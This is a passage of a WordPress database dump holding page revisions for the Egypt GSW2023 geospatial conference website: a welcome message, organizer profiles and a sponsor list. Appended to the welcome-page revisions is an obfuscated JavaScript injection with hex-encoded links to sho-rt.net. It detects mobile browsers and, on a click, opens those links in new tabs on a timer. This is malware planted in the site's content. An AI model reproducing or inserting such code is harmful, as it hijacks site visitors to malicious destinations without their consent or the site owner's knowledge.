)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:02:59','2023-06-03 11:02:59','',3233,'https://gsw2023.com/?p=4622',0,'revision','',0),
(4623,1,'2023-06-03 11:05:21','2023-06-03 11:05:21','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][/vc_row][vc_row css=\".vc_custom_1685790265719{margin-top: -75px !important;}\"][vc_column][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology,and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States.</p>\n<p style=\"text-align: justify; color: black;\">AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world.</p>\n<p style=\"text-align: justify; color: black;\">We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, Alf-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2270\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png\" alt=\"\" width=\"118\" height=\"117\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-4613 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"94\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_column_text]<img class=\"alignnone wp-image-2272 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"124\" height=\"124\" /></p>\n<p>&nbsp;</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n<p>&nbsp;</p>\n</section>\n</div>\n</div>\n</div>\n</div>\n</div>\n<footer id=\"footer\" class=\"footer solid-bg footer-outline-decoration full-width empty-footer\">\n<div id=\"bottom-bar\" class=\"solid-bg logo-left\" role=\"contentinfo\">\n<div class=\"wf-wrap\">\n<div class=\"wf-container-bottom\"></div>\n</div>\n</div>\n</footer>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2023-06-03 11:05:21','2023-06-03 11:05:21','',3233,'https://gsw2023.com/?p=4623',0,'revision','',0),
(4624,1,'2023-06-03 11:26:56','2023-06-03 11:26:56','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" 